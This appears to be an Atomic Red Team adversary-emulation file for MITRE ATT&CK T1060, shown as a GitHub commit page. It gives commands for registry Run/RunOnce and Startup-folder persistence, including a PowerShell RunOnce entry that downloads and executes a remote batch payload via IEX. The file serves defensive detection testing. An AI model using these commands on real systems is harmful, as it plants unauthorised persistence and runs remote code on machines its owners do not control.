Michael Haag
aee2840fd5
+ Office Application Startup -- Added DDEAUTO and Dragon's Tail link + Registry Run Keys and Start Folder -- Added a couple of items to make this interesting. +Updated Windows Readme
38 lines
1.5 KiB
Markdown
38 lines
1.5 KiB
Markdown
# Registry Run Keys / Start Folder
|
|
|
|
MITRE ATT&CK Technique: [T1060](https://attack.mitre.org/wiki/Technique/T1060)
|
|
|
|
## Reg Add
|
|
|
|
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "C:\Path\AtomicRedTeam.exe"
|
|
|
|
|
|
|
|
## PowerShell
|
|
|
|
$RunOnceKey = "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce"
|
|
set-itemproperty $RunOnceKey "NextRun" 'C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat`")"'
|
|
|
|
Oneliner:
|
|
|
|
set-itemproperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce" "NextRun" 'C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat`")"'
|
|
|
|
## Startup Folder
|
|
|
|
Single User:
|
|
|
|
C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
|
|
|
|
All Users:
|
|
|
|
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
|
|
|
|
Add .lnk file to startup with PowerShell:
|
|
|
|
$TargetFile = "$env:SystemRoot\System32\notepad.exe"
|
|
$ShortcutFile = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Notepad.lnk"
|
|
$WScriptShell = New-Object -ComObject WScript.Shell
|
|
$Shortcut = $WScriptShell.CreateShortcut($ShortcutFile)
|
|
$Shortcut.TargetPath = $TargetFile
|
|
$Shortcut.Save()
|